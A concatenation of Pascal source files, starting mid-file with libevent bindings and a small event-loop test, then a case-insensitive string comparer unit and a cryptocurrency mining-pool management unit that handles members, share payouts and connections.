*bev, ev_ssize_t decr); //int bufferevent_rate_limit_group_decrement_read(struct bufferevent_rate_limit_group *, ev_ssize_t); //int bufferevent_rate_limit_group_decrement_write(struct bufferevent_rate_limit_group *, ev_ssize_t); //void bufferevent_rate_limit_group_get_totals(struct bufferevent_rate_limit_group *grp,ev_uint64_t *total_read_out, ev_uint64_t *total_written_out); //void bufferevent_rate_limit_group_reset_totals(struct bufferevent_rate_limit_group *grp); //;cdecl ; external; //;cdecl ; external; //SSL function bufferevent_get_openssl_error (const bev : PBufferevent):culong; cdecl; external; function bufferevent_openssl_filter_new (const base : PEvent_base ; underlying : Pbufferevent ; ssl : Pssl_st ; ssl_state : cInt ; options : cint):Pbufferevent;cdecl ; external; function bufferevent_openssl_socket_new (const base : PEvent_base ; fd : evutil_socket_t ; ssl : Pssl_st ; ssl_state : cInt ; options : cint):PBufferevent ; cdecl ; external; function bufferevent_openssl_get_ssl (const bev : PBufferevent):Pssl_st; cdecl ; external; function bufferevent_ssl_renegotiate (const bev : Pbufferevent):cint; cdecl ; external; //dns function evdns_base_new (event_base:PEvent_base ; initialize_nameservers : cint):Pevdns_base ; cdecl ; external; procedure evdns_base_free ( base:Pevdns_base ; fail_requests : cint) ; cdecl ; external ; //util // RFC3493 function evutil_inet_ntop (af : cInt ; src:Pointer ; dst : PChar ; dst_len : size_t) : PChar ; cdecl ; external; function evutil_inet_pton (af : cInt ; src:Pchar ; dst : Pointer) : cInt ; cdecl ; external; function evutil_parse_sockaddr_port (str : PChar ; out_sa : PFCOM_SOCKADDRSTORAGE ; var outlen : cInt) : cInt ; cdecl ; external; function evutil_gai_strerror (err : cInt):PChar ; cdecl ; external; function evutil_socketpair (const d, typ, protocol :cInt ; sv : tevutil_socket_t_pair):cInt ; cdecl ; external; function evutil_make_socket_nonblocking (sock : evutil_socket_t):cint ; cdecl ; external; function evutil_make_listen_socket_reuseable (sock : evutil_socket_t):cint ; cdecl ; external; function evutil_make_socket_closeonexec (sock : evutil_socket_t):cint ; cdecl ; external; function evutil_closesocket (sock : evutil_socket_t):cint ; cdecl ; external; //function evutil_socket_geterror (sock : evutil_socket_t):cint ; cdecl ; external; function evutil_socket_error_to_string (errcode:cint):Pchar ; cdecl ; external; function evbuffer_new : PEvbuffer ; cdecl ; external; procedure evbuffer_free (const evbuffer:PEvbuffer) ; cdecl ; external; function evbuffer_get_length (const evbuffer:PEvbuffer):size_t ; cdecl ; external; function evbuffer_get_contiguous_space (const evbuffer:PEvbuffer):size_t ; cdecl ; external; function evbuffer_expand (const evbuffer:PEvbuffer; datlen : size_t):cInt ; cdecl ; external; function evbuffer_add (const evbuffer:PEvbuffer; const data: Pointer ; const datlen :size_t):cInt ; cdecl ; external; function evbuffer_remove (const evbuffer:PEvbuffer; const data: Pointer ; const datlen :size_t):cInt ; cdecl ; external; function evbuffer_copyout (const evbuffer:PEvbuffer; const data: Pointer ; const datlen :size_t):ev_ssize_t ; cdecl ; external; function evbuffer_remove_buffer (const src, dst:PEvbuffer; const datlen : size_t):cint ; cdecl ; external; function evbuffer_readln (const buffer:PEvbuffer; var n_read_out : size_t ; eol_style :evbuffer_eol_style):PChar; cdecl ; external; function evbuffer_add_buffer (const outbuffer,inbuffer:PEvbuffer):cInt ; cdecl ; external; function evbuffer_add_file (const outbuffer:PEvbuffer ; fd :cInt ; offset,len : ev_off_t):cInt ; cdecl ; external; function evbuffer_drain (const buffer:PEvbuffer ; const len : size_t):cint ; cdecl ; external; function evbuffer_write (const buffer:PEvbuffer ; fd : evutil_socket_t):cint ; cdecl ; external; function evbuffer_write_atmost (const buffer:PEvbuffer ; fd : evutil_socket_t ; howmuch : ev_ssize_t):cint ; cdecl ; external; function evbuffer_read (const buffer:PEvbuffer ; fd : evutil_socket_t ; howmuch : cint):cint ; cdecl ; external; function evbuffer_peek (const buffer:PEvbuffer ; len : ev_ssize_t ; start_at : Pevbuffer_ptr ; vec_out : Pevbuffer_iovec ; n_vec : cInt):cInt ; cdecl ; external; function evbuffer_pullup (const buffer:PEvbuffer ; size : ev_ssize_t):Pbyte ; cdecl ; external; function evbuffer_prepend (const evbuffer:PEvbuffer; const data: Pointer ; const datlen :size_t):cInt ; cdecl ; external; function evbuffer_prepend_buffer (const outbuffer,inbuffer:PEvbuffer):cInt ; cdecl ; external; function evbuffer_reserve_space (const buffer:PEvbuffer ; size : ev_ssize_t ; vec: Pevbuffer_iovec ; n_vec : cInt):cInt ; cdecl ; external; function evbuffer_commit_space (const buffer:PEvbuffer ; vec: Pevbuffer_iovec ; n_vec : cInt):cInt ; cdecl ; external; function evbuffer_add_cb (const buffer:PEvbuffer ; cb : evbuffer_cb_func ; cbarg : Pointer ):Pevbuffer_cb_entry; cdecl ; external; function evbuffer_remove_cb_entry (const buffer:PEvbuffer ; ent : Pevbuffer_cb_entry):cInt ; cdecl ; external; procedure Test_LE; implementation var cfg : Pevent_config; res : integer; base : PEvent_base; procedure EventCB (fd : evutil_socket_t ; short: cshort ; data:pointer); cdecl; var tvw : TFCOM_TimeVal = (tv_sec : 5 ; tv_usec : 0); begin writeln('EVENT CALLBACK ',fd,' ',short,' ',integer(data),' ', PtrUInt(GetThreadID)); writeln(event_base_loopbreak(base)); tvw.tv_sec:=0; tvw.tv_usec:=0; writeln(event_base_loopexit(base,@tvw)); end; procedure EventCB2(fd : evutil_socket_t ; short: cshort ; data:pointer); cdecl; //var tvw : TFCOM_TimeVal = (tv_sec : 5 ; tv_usec : 0); begin writeln('EVENT CALLBACK 2 ',fd,' ',short,' ',integer(data),' ', PtrUInt(GetThreadID)); sleep(2000); //writeln(event_base_loopbreak(base)); //tvw.tv_sec:=0; //tvw.tv_usec:=0; //writeln(event_base_loopexit(base,@tvw)); end; type { TEV2_Thread } TEV2_Thread=class(tthread) private Fev : PEvent; FEvb : PEvent_base; constructor Create(const evb : PEvent_base); procedure Execute;override; end; { TEV2_Thread } constructor TEV2_Thread.Create(const evb: PEvent_base); begin FreeOnTerminate:=true; FevB := evb; Inherited create(False); end; procedure TEV2_Thread.Execute; var i:integer; begin FreeOnTerminate:=true; //Fev := event_new(FEvb,-1,EV_READ or EV_WRITE or EV_PERSIST,@EventCB2,nil); Fev := event_new(FEvb,-1,EV_READ or EV_WRITE,@EventCB2,nil); event_add(Fev,nil); for i:=0 to 20 do begin sleep(5); if i mod 2=0 then begin writeln('SENDEV R',PtrUInt(GetThreadID)); event_active(Fev,EV_READ,0); end else begin writeln('SENDEV W',PtrUInt(GetThreadID)); event_active(Fev,EV_WRITE,0); end; end; end; procedure TesT_LE; var meths : PPchar; i : Integer; tv : TFCOM_TimeVal = (tv_sec : 10 ; tv_usec : 0); tv2 : TFCOM_TimeVal = (tv_sec : 1 ; tv_usec : 0); ev1, ev2 : PEvent; procedure _setupUnix; procedure _SetupSignals; var ign,dummy: SigactionRec; begin ign.sa_handler:=SigActionHandler(SIG_IGN); ign.sa_flags:=0; fpsigemptyset(ign.sa_mask); FPsigaction(SIGINT, @ign, @dummy); FPSigaction(SIGUSR1, @ign, @dummy); FPSigaction(SIGHUP, @ign, @dummy); FPSigaction(SIGTERM, @ign, @dummy); FPSigaction(SIGPIPE, @ign, @dummy); // IGNORE BROKEN PIPE end; begin _SetupSignals; end; var sa : TFCOM_SOCKADDRSTORAGE; //sa : sockaddr; len : cInt; s : string; res_string : string; begin writeln('Libevent Ussepthreads ',evthread_use_pthreads); writeln('Libevent Test ',PChar(event_get_version)); // res := evutil_parse_sockaddr_port('fe80::ca2a:14ff:fe14:2764',@sa,len); len := sizeof(TFCOM_SOCKADDRSTORAGE); writeln('sizeof sockaddr ',len); FillByte(sa,sizeof(sa),0); res := evutil_parse_sockaddr_port('[fe80::ca2a:14ff:fe14:2764]:44000',@sa,len); res := evutil_parse_sockaddr_port('10.1.0.133:44000',@sa,len); writeln('PARSE ',res,' ',len); setlength(res_string,128); writeln(sa.sin_family); case sa.sin_family of FCOM_AF_INET : evutil_inet_ntop(FCOM_AF_INET,@sa.sin_addr,@res_String[1],Length(res_string)); FCOM_AF_INET6: evutil_inet_ntop(FCOM_AF_INET6,@sa.sin6_addr,@res_String[1],Length(res_string)); end; writeln('FORMAT : ',pchar(@res_string[1]),' ',BEtoN(sa.sin_port),' ',BEtoN(sa.sin6_port)); cfg := event_config_new; writeln('cfg ',integer(cfg)); // res := event_config_avoid_method(cfg, 'xx-kqueue'); // writeln('avoid : ',res); // res := event_config_require_features(cfg, EV_FEATURE_ET or EV_FEATURE_O1 or EV_FEATURE_FDS); res := event_config_require_features(cfg, EV_FEATURE_O1); writeln('features : ',res); // base := event_base_new_with_config(cfg); base := event_base_new; writeln('Libevent make_base_notifiable ',evthread_make_base_notifiable(base)); //writeln('Libevent make_base_notifiable ',evthread_make_base_notifiable(base)); event_config_free(cfg); writeln('base : ',integer(base)); _setupUnix; meths := event_get_supported_methods; for i:=0 to 100 do begin if assigned(meths[i]) then begin writeln('All Method : ',i,' ',string(meths[i])); end else break; end; writeln('Chosen Method : ',string(event_base_get_method(base)),' Features : ',event_base_get_features(base)); ev1 := event_new(base, SIGINT, EV_SIGNAL or EV_PERSIST, @EventCB, nil); writeln('EV1 ',integer(ev1)); //event_base_loopexit(base, @tv); writeln('LOOP'); event_add(ev1,@tv); TEV2_Thread.create(base); // event_base_loop(base,EVLOOP_NO_EXIT_ON_EMPTY); event_base_loop(base,0); writeln('DONE'); event_base_free(base); end; end.
unit System.Comparers; interface uses System.Generics.Defaults; type TCaseInsensitiveStringComparer = class(TInterfacedObject, IComparer<String>) private class function GetDefaultComparer: IComparer<String>; static; protected class var FDefaultStrComparer: IComparer<String>; public function Compare(const Left, Right: String): Integer; class property DefaultComparer: IComparer<String> read GetDefaultComparer; end; function CompareStrCaseInsensitive(const Left, Right: String): Integer; implementation uses System.Character; { TInsensitiveStringComparer } function CaseInsensitiveChar(const C: Char): Char; inline; begin Result := C.ToUpper(); end; function CompareStrCaseInsensitive(const Left, Right: String): Integer; var P1, P2: PChar; C1, C2: Char; begin if (Left = '') then begin if Right = '' then Exit(0) else Exit(-1); end else if Right = '' then Exit(+1); P1 := PChar(Left); P2 := PChar(Right); while True do begin C1 := CaseInsensitiveChar(P1^); C2 := CaseInsensitiveChar(P2^); if (C1 <> C2) or (C1 = #0) then Exit(Ord(C1) - Ord(C2)); Inc(P1); Inc(P2); end; end; function TCaseInsensitiveStringComparer.Compare(const Left, Right: String): Integer; begin Result := CompareStrCaseInsensitive(Left, Right); end; class function TCaseInsensitiveStringComparer.GetDefaultComparer: IComparer<String>; begin if TCaseInsensitiveStringComparer.FDefaultStrComparer = nil then TCaseInsensitiveStringComparer.FDefaultStrComparer := TCaseInsensitiveStringComparer.Create(); Result := TCaseInsensitiveStringComparer.FDefaultStrComparer; end; end.
unit PoolManage; {$mode objfpc}{$H+} interface uses Classes, SysUtils, IdContext, IdGlobal, fileutil; function PoolDataString(member:string):String; function GetPoolEmptySlot():integer; function GetMemberPrefijo(poolslot:integer):string; function PoolAddNewMember(direccion:string):string; Procedure LoadMyPoolData(); Procedure SaveMyPoolData(); function GetPoolMemberBalance(direccion:string):int64; Procedure SetMinerUpdate(Rvalue:boolean;number:integer); Procedure ResetPoolMiningInfo(); Procedure AdjustWrongSteps(); function GetPoolNumeroDePasos():integer; Procedure DistribuirEnPool(cantidad:int64); Function GetTotalPoolDeuda():Int64; Procedure AcreditarPoolStep(direccion:string; value:integer); function GetLastPagoPoolMember(direccion:string):integer; Procedure ClearPoolUserBalance(direccion:string); Procedure PoolUndoneLastPayment(); function SavePoolServerConnection(Ip,Prefijo,UserAddress,minerver:String;contexto:TIdContext):boolean; function GetPoolTotalActiveConex ():integer; function GetPoolContextIndex(AContext: TIdContext):integer; Procedure BorrarPoolServerConex(AContext: TIdContext); Procedure CalculatePoolHashrate(); function GetPoolMemberPosition(member:String):integer; function IsPoolMemberConnected(address:string):integer; Function NewSavePoolPayment(DataLine:string):boolean; Function GetMinerHashrate(slot:integer):int64; function PoolStatusString():String; function StepAlreadyAdded(stepstring:string):Boolean; Procedure RestartPoolSolution(); function KickPoolIP(IP:string):integer; Procedure UpdateMinerPing(index:integer;Hashpower:int64 = -1); Function IsMinerPinedOut(index:integer):boolean; implementation uses MasterPaskalForm, mpparser, mpminer, mpdisk, mptime, mpGUI, mpCoin; //** Returns an array with all the information for miners function PoolDataString(member:string):String; // ThSa verified! var MemberBalance : Int64; lastpago : integer; BlocksTillPayment : integer; allinfotext : string; Begin MemberBalance := GetPoolMemberBalance(member); lastpago := GetLastPagoPoolMember(member); EnterCriticalSection(CSPoolMiner); BlocksTillPayment := MyLastBlock-(lastpago+PoolInfo.TipoPago); allinfotext :=IntToStr(PoolMiner.Block)+' '+ // block target PoolMiner.Target+' '+ // string target IntToStr(PoolMiner.DiffChars)+' '+ // target chars inttostr(PoolMiner.steps)+' '+ // founded steps inttostr(PoolMiner.Dificult)+' '+ // block difficult IntToStr(MemberBalance)+' '+ // member balance IntToStr(BlocksTillPayment)+' '+ // block payment IntToStr(PoolTotalHashRate)+' '+ IntToStr(PoolStepsDeep); // Pool Hash Rate LeaveCriticalSection(CSPoolMiner); Result := 'PoolData '+allinfotext; End; //** returns an empty slot in the pool function GetPoolEmptySlot():integer; // ThSa verified! var contador : integer; Begin result := -1; Entercriticalsection(CSPoolMembers); if length(ArrayPoolMembers)>0 then begin for contador := 0 to length(ArrayPoolMembers)-1 do begin if ArrayPoolMembers[contador].Direccion = '' then begin result := contador; break; end; end; end; Leavecriticalsection(CSPoolMembers); End; //** returns a valid prefix for the miner function GetMemberPrefijo(poolslot:integer):string; var firstchar, secondchar : integer; HashChars : integer; Begin HashChars := length(HasheableChars)-1; firstchar := poolslot div HashChars; secondchar := poolslot mod HashChars; result := HasheableChars[firstchar+1]+HasheableChars[secondchar+1]+'0000000'; End; //** Returns the prefix for a new connection or empty if pool is full function PoolAddNewMember(direccion:string):string; // ThSa verified! var PoolSlot : integer; CurrPos : integer; Begin SetCurrentJob('PoolAddNewMember',true); PoolSlot := GetPoolEmptySlot; CurrPos := GetPoolMemberPosition(direccion); EnterCriticalSection(CSPoolMembers); setmilitime('PoolAddNewMember',1); result := ''; if ( (length(ArrayPoolMembers)>0) and (CurrPos>=0) ) then begin result := ArrayPoolMembers[CurrPos].Prefijo; end else if ( (length(ArrayPoolMembers)>0) and (PoolSlot >= 0) ) then begin ArrayPoolMembers[PoolSlot].Direccion:=direccion; ArrayPoolMembers[PoolSlot].Prefijo:=GetMemberPrefijo(PoolSlot); ArrayPoolMembers[PoolSlot].Deuda:=0; ArrayPoolMembers[PoolSlot].Soluciones:=0; ArrayPoolMembers[PoolSlot].LastPago:=MyLastBlock; ArrayPoolMembers[PoolSlot].TotalGanado:=0; ArrayPoolMembers[PoolSlot].LastSolucion:=0; ArrayPoolMembers[PoolSlot].LastEarned:=0; S_PoolMembers := true; result := ArrayPoolMembers[PoolSlot].Prefijo; end; LeaveCriticalSection(CSPoolMembers); setmilitime('PoolAddNewMember',2); SetCurrentJob('PoolAddNewMember',false); End; Procedure LoadMyPoolData(); Begin MyPoolData.Direccion:=Parameter(UserOptions.PoolInfo,0); MyPoolData.Prefijo:=Parameter(UserOptions.PoolInfo,1); MyPoolData.Ip:=Parameter(UserOptions.PoolInfo,2); MyPoolData.port:=StrToIntDef(Parameter(UserOptions.PoolInfo,3),8082); MyPoolData.MyAddress:=Parameter(UserOptions.PoolInfo,4); MyPoolData.Name:=Parameter(UserOptions.PoolInfo,5); MyPoolData.Password:=Parameter(UserOptions.PoolInfo,6); MyPoolData.balance:=0; MyPoolData.LastPago:=0; //Miner_UsingPool := true; End; Procedure SaveMyPoolData(); Begin UserOptions.PoolInfo:=MyPoolData.Direccion+' '+ MyPoolData.Prefijo+' '+ MyPoolData.Ip+' '+ IntToStr(MyPoolData.port)+' '+ MyPoolData.MyAddress+' '+ MyPoolData.Name+' '+ MyPoolData.Password; S_Options := true; End; function GetPoolMemberBalance(direccion:string):int64; // ThSa verified! var contador : integer; Begin result :=0; Entercriticalsection(CSPoolMembers); if length(ArrayPoolMembers)>0 then begin for contador := 0 to length(ArrayPoolMembers)-1 do begin if arraypoolmembers[contador].Direccion = direccion then begin result := arraypoolmembers[contador].Deuda; break; end; end; end; Leavecriticalsection(CSPoolMembers); End; Procedure AdjustWrongSteps(); // ThSa verified! var counter : integer; Begin EnterCriticalSection(CSMinersConex); for counter := 0 to length(PoolServerConex)-1 do begin if PoolServerConex[counter].Address <> '' then begin PoolServerConex[counter].WrongSteps-=1; if PoolServerConex[counter].WrongSteps<0 then PoolServerConex[counter].WrongSteps := 0; end; end; LeaveCriticalSection(CSMinersConex); End; Procedure SetMinerUpdate(Rvalue:boolean;number:integer); // ThSa verified! var counter : integer; Begin if number = -1 then Begin EnterCriticalSection(CSMinersConex); for counter := 0 to length(PoolServerConex)-1 do PoolServerConex[counter].SendSteps:=Rvalue; LeaveCriticalSection(CSMinersConex); end else begin EnterCriticalSection(CSMinersConex); PoolServerConex[number].SendSteps:=Rvalue; LeaveCriticalSection(CSMinersConex); end; End; Procedure ResetPoolMiningInfo(); Begin EnterCriticalSection(CSPoolMiner); PoolMiner.Block:=LastBlockData.Number+1; PoolMiner.Solucion:=''; PoolMiner.steps:=0; PoolMiner.Dificult:=LastBlockData.NxtBlkDiff; PoolMiner.DiffChars:=GetCharsFromDifficult(PoolMiner.Dificult, PoolMiner.steps); PoolMiner.Target:=MyLastBlockHash; AdjustWrongSteps(); PoolMinerBlockFound := false; SetLength(Miner_PoolSharedStep,0); LeaveCriticalSection(CSPoolMiner); SetMinerUpdate(true,-1); End; Function GetPoolMinningInfo():PoolMinerData; Begin EnterCriticalSection(CSPoolMiner); result := PoolMiner; LeaveCriticalSection(CSPoolMiner); End; Procedure SetPoolMinningInfo(NewData:PoolMinerData); Begin EnterCriticalSection(CSPoolMiner); PoolMiner := NewData; LeaveCriticalSection(CSPoolMiner); End; function GetPoolNumeroDePasos():integer; // ThSa verified! var contador : integer; Begin result := 0; Entercriticalsection(CSPoolMembers); if length(arraypoolmembers)>0 then begin for contador := 0 to length(arraypoolmembers)-1 do result := result + arraypoolmembers[contador].Soluciones; end; Leavecriticalsection(CSPoolMembers); End; Function GetTotalPoolDeuda():Int64; // ThSa verified! var contador : integer; Begin Result := 0; Entercriticalsection(CSPoolMembers); if length(arraypoolmembers)>0 then begin for contador := 0 to length(arraypoolmembers)-1 do Result := Result + arraypoolmembers[contador].Deuda; end; Leavecriticalsection(CSPoolMembers); End; Procedure DistribuirEnPool(cantidad:int64); // ThSa verified! var numerodepasos: integer; PoolComision : int64; ARepartir, PagoPorStep, PagoPorPOS, MinersConPos: int64; contador : integer; RepartirShares : int64; Begin setmilitime('DistribuirEnPool',1); ARepartir := Cantidad; NumeroDePasos := GetPoolNumeroDePasos(); PoolComision := (cantidad* PoolInfo.Porcentaje) div 10000; PoolInfo.FeeEarned:=PoolInfo.FeeEarned+PoolComision; ARepartir := ARepartir-PoolComision; RepartirShares := (ARepartir * PoolShare) div 100; PagoPorStep := RepartirShares div NumeroDePasos; // DISTRIBUTE SHARES for contador := 0 to length(arraypoolmembers)-1 do begin Entercriticalsection(CSPoolMembers); if arraypoolmembers[contador].Soluciones > 0 then begin arraypoolmembers[contador].Deuda:=arraypoolmembers[contador].Deuda+ (arraypoolmembers[contador].Soluciones*PagoPorStep); arraypoolmembers[contador].TotalGanado:=arraypoolmembers[contador].TotalGanado+ (arraypoolmembers[contador].Soluciones*PagoPorStep); arraypoolmembers[contador].LastEarned:=(arraypoolmembers[contador].Soluciones*PagoPorStep); arraypoolmembers[contador].Soluciones := 0; end else begin arraypoolmembers[contador].LastEarned:=0; end; Leavecriticalsection(CSPoolMembers); end; ConsoleLinesAdd('Pool Shares : '+IntToStr(NumeroDePasos)); ConsoleLinesAdd('Pay per Share : '+Int2Curr(PagoPorStep)); PoolMembersTotalDeuda := GetTotalPoolDeuda(); S_PoolInfo := true; setmilitime('DistribuirEnPool',2); End; Procedure AcreditarPoolStep(direccion:string; value:integer); // ThSa verified! var contador : integer; Begin Entercriticalsection(CSPoolMembers); if length(arraypoolmembers)>0 then begin for contador := 0 to length(arraypoolmembers)-1 do begin if arraypoolmembers[contador].Direccion = direccion then begin arraypoolmembers[contador].Soluciones :=arraypoolmembers[contador].Soluciones+value; arraypoolmembers[contador].LastSolucion:=PoolMiner.Block; break; end; end; end; Leavecriticalsection(CSPoolMembers); End; function GetLastPagoPoolMember(direccion:string):integer; // ThSa verified! var contador : integer; Begin result :=-1; entercriticalsection(CSPoolMembers); if length(ArrayPoolMembers)>0 then begin for contador := 0 to length(ArrayPoolMembers)-1 do begin if arraypoolmembers[contador].Direccion = direccion then begin result := arraypoolmembers[contador].LastPago; break; end; end; end; Leavecriticalsection(CSPoolMembers); End; Procedure ClearPoolUserBalance(direccion:string); // ThSa verified! var contador : integer; Begin entercriticalsection(CSPoolMembers); if length(ArrayPoolMembers)>0 then begin for contador := 0 to length(ArrayPoolMembers)-1 do begin if arraypoolmembers[contador].Direccion = direccion then begin arraypoolmembers[contador].Deuda:=0; arraypoolmembers[contador].LastPago:=MyLastBlock; break; end; end; end; Leavecriticalsection(CSPoolMembers); S_PoolMembers := true; S_PoolInfo := true; PoolMembersTotalDeuda := GetTotalPoolDeuda(); End; Procedure PoolUndoneLastPayment(); // ThSa verified! var contador : integer; totalmenos : int64 = 0; Begin entercriticalsection(CSPoolMembers); if length(arraypoolmembers)>0 then begin for contador := 0 to length(arraypoolmembers)-1 do begin totalmenos := totalmenos+ arraypoolmembers[contador].LastEarned; arraypoolmembers[contador].Deuda :=arraypoolmembers[contador].Deuda-arraypoolmembers[contador].LastEarned; if arraypoolmembers[contador].deuda < 0 then arraypoolmembers[contador].deuda := 0; arraypoolmembers[contador].TotalGanado:=arraypoolmembers[contador].TotalGanado-arraypoolmembers[contador].LastEarned; end; end; Leavecriticalsection(CSPoolMembers); S_PoolMembers := true; ConsoleLinesAdd('Discounted last payment to pool members : '+Int2curr(totalmenos)); PoolMembersTotalDeuda := GetTotalPoolDeuda(); End; function GetPoolSlotFromPrefjo(prefijo:string):Integer; // ThSa verified! var counter : integer; Begin result := -1; Entercriticalsection(CSPoolMembers); for counter := 0 to length(arraypoolmembers)-1 do begin if arraypoolmembers[counter].Prefijo = prefijo then begin result := counter; break; end; end; Leavecriticalsection(CSPoolMembers); End; function SavePoolServerConnection(Ip,Prefijo,UserAddress,minerver:String;contexto:TIdContext): boolean; // ThSa verified! var newdato : PoolUserConnection; slot: integer; Begin result := false; slot := GetPoolSlotFromPrefjo(Prefijo); EnterCriticalSection(CSMinersConex); if slot >= 0 then begin NewDato := Default(PoolUserConnection); NewDato.Ip:=Ip; NewDato.Address:=UserAddress; NewDato.Context:=Contexto; NewDato.slot:=slot; NewDato.Version:=minerver; NewDato.LastPing:=StrToInt64(UTCTime); PoolServerConex[slot] := NewDato; result := true; U_PoolConexGrid := true; end; LeaveCriticalSection(CSMinersConex); End; function GetPoolTotalActiveConex ():integer; // ThSa verified! var cont:integer; Begin result := 0; EnterCriticalSection(CSMinersConex); if length(PoolServerConex) > 0 then begin for cont := 0 to length(PoolServerConex)-1 do if PoolServerConex[cont].Address<>'' then result := result + 1; end; LeaveCriticalSection(CSMinersConex); End; function GetPoolContextIndex(AContext: TIdContext):integer; // ThSa verified! var contador : integer = 0; Begin result := -1; EnterCriticalSection(CSMinersConex); if length(PoolServerConex) > 0 then begin for contador := 0 to length(PoolServerConex)-1 do begin if Poolserverconex[contador].Context=AContext then begin result := contador; break; end; end; end; LeaveCriticalSection(CSMinersConex); End; Procedure BorrarPoolServerConex(AContext: TIdContext); // ThSa verified! var contador : integer = 0; Begin if G_ClosingAPP then exit; setmilitime('BorrarPoolServerConex',1); EnterCriticalSection(CSMinersConex); if length(PoolServerConex) > 0 then begin for contador := 0 to length(PoolServerConex)-1 do begin if Poolserverconex[contador].Context=AContext then begin if AContext.Connection.Connected then TRY AContext.Connection.Disconnect; EXCEPT ON E:Exception do begin ToPoolLog('Error trying to RECLOSE pool member:'+E.Message); end; END;{Try} Poolserverconex[contador]:=Default(PoolUserConnection); U_PoolConexGrid := true; break end; end; end; LeaveCriticalSection(CSMinersConex); setmilitime('BorrarPoolServerConex',2); End; // VERIFY THE POOL CONECTIONS AND REFRESH POOL TOTAL HASHRATE Procedure CalculatePoolHashrate(); var contador : integer; memberaddress : string; Begin PoolTotalHashRate := 0; LastPoolHashRequest := StrToInt64(UTCTime); if ( (Miner_OwnsAPool) and (length(PoolServerConex)>0) ) then begin for contador := 0 to length(PoolServerConex)-1 do begin TRY PoolTotalHashRate := PoolTotalHashRate + GetMinerHashrate(contador); EXCEPT on E:Exception do toPoollog('Error calculating pool hashrate: '+E.Message); END{Try}; end; end; if ( (POOL_LBS) and (poolminer.steps<=8) and (G_TotalPings>500) ) then ProcessLinesAdd('Restart'); End; function GetPoolMemberPosition(member:String):integer; // ThSa verified! var contador : integer; Begin result := -1; Entercriticalsection(CSPoolMembers); if length(ArrayPoolMembers)>0 then begin for contador := 0 to length(ArrayPoolMembers)-1 do begin if arraypoolmembers[contador].Direccion= member then begin result := contador; break; end; end; end; Leavecriticalsection(CSPoolMembers); End; function IsPoolMemberConnected(address:string):integer; // ThSa verified! var counter : integer; Begin result := -1; EnterCriticalSection(CSMinersConex); if length(PoolServerConex)>0 then begin for counter := 0 to length(PoolServerConex)-1 do if ((Address<>'') and (PoolServerConex[counter].Address=address)) then begin result := counter; break; end; end; LeaveCriticalSection(CSMinersConex); End; Function NewSavePoolPayment(DataLine:string):boolean; // ThSa verified! var archivo : file of PoolPaymentData; ThisPay : PoolPaymentData; Begin result:= true; ThisPay := Default(PoolPaymentData); ThisPay.block:=StrToIntDef(Parameter(DataLine,0),0); Thispay.address:=Parameter(DataLine,1); Thispay.amount:=StrToIntDef(Parameter(DataLine,2),0); Thispay.Order:=Parameter(DataLine,3); Assignfile(archivo, PoolPaymentsFilename); {$I-} reset(archivo); {$I+} If IOResult = 0 then// File is open begin TRY seek(archivo,filesize(archivo)); write(archivo,Thispay); insert(Thispay,ArrPoolPays,length(ArrPoolPays)); EXCEPT ON E:Exception do begin result := false; Consolelinesadd('ERROR SAVING POOLPAYS FILE'); end; END;{Try} Closefile(archivo); end else result := false; End; Function GetMinerHashrate(slot:integer):int64; // ThSa verified! Begin result := 0; EnterCriticalSection(CSMinersConex); result := PoolServerConex[slot].Hashpower; LeaveCriticalSection(CSMinersConex); End; //STATUS 1{PoolHashRate} 2{PoolFee} 3{PoolShare} 4{blockdiff} 5{Minercount} 6{arrayofminers address:balance:blockstillopay:hashpower} function PoolStatusString():String; // ThSa verified! var resString : string = ''; counter : integer; miners : integer = 0; Begin Entercriticalsection(CSPoolMembers); TRY for counter := 0 to length(arraypoolmembers)-1 do begin if arraypoolmembers[counter].Direccion<>'' then begin resString := resString+arraypoolmembers[counter].Direccion+':'+IntToStr(arraypoolmembers[counter].Deuda)+':'+ IntToStr(MyLastBlock-(arraypoolmembers[counter].LastPago+PoolInfo.TipoPago))+ ':'+GetMinerHashrate(counter).ToString+' '; miners +=1; end; end; EXCEPT ON E:Exception do begin ToExcLog('Error generating pool status string: '+E.Message); end END{Try}; Leavecriticalsection(CSPoolMembers); result:= 'STATUS '+IntToStr(PoolTotalHashRate)+' '+IntToStr(poolinfo.Porcentaje)+' '+ IntToStr(PoolShare)+' '+IntToStr(PoolMiner.Dificult)+' '+IntToStr(miners)+' '+resString; End; function StepAlreadyAdded(stepstring:string):Boolean; // ThSa verified! var counter : integer; Begin result := false; EnterCriticalSection(CSPoolMiner); if length(Miner_PoolSharedStep) > 0 then begin for counter := 0 to length(Miner_PoolSharedStep)-1 do begin if stepstring = Miner_PoolSharedStep[counter] then begin result := true; break; end; end; end; LeaveCriticalSection(CSPoolMiner); end; Procedure RestartPoolSolution(); var steps,counter : integer; Begin steps := StrToIntDef(parameter(Miner_RestartedSolution,1),0); if ( (steps > 0) and (steps < 10) ) then begin PoolMiner.steps := steps; PoolMiner.DiffChars:=GetCharsFromDifficult(PoolMiner.Dificult, PoolMiner.steps); for counter := 0 to steps-1 do begin PoolMiner.Solucion := PoolMiner.Solucion+Parameter(Miner_RestartedSolution,2+counter)+' '; end; end; CrearRestartfile; End; function KickPoolIP(IP:string): integer; var counter : integer; thiscontext : TIdContext; Begin result := 0; for counter := 0 to length(PoolServerConex)-1 do begin if PoolServerConex[counter].Ip = Ip then begin thiscontext := PoolServerConex[counter].Context; TRY PoolServerConex[counter].Context.Connection.IOHandler.InputBuffer.Clear; PoolServerConex[counter].Context.Connection.Disconnect; result := result+1; BorrarPoolServerConex(thiscontext); EXCEPT ON E: Exception do begin ToPoolLog('Cant kick connection from: '+IP); end; end; end; end; End; // ***** New ThSa functions Procedure UpdateMinerPing(index:integer;Hashpower:int64 = -1); Begin EnterCriticalSection(CSMinersConex); PoolServerConex[index].LastPing:=UTCTime.ToInt64; if hashpower > -1 then PoolServerConex[index].Hashpower:=Hashpower; LeaveCriticalSection(CSMinersConex); End; Function IsMinerPinedOut(index:integer):boolean; var LastPing : int64; Begin result := false; EnterCriticalSection(CSMinersConex); LastPing := PoolServerConex[index].LastPing; LeaveCriticalSection(CSMinersConex); if LastPing+15<UTCTime.ToInt64 then result := true; End; END. // END UNIT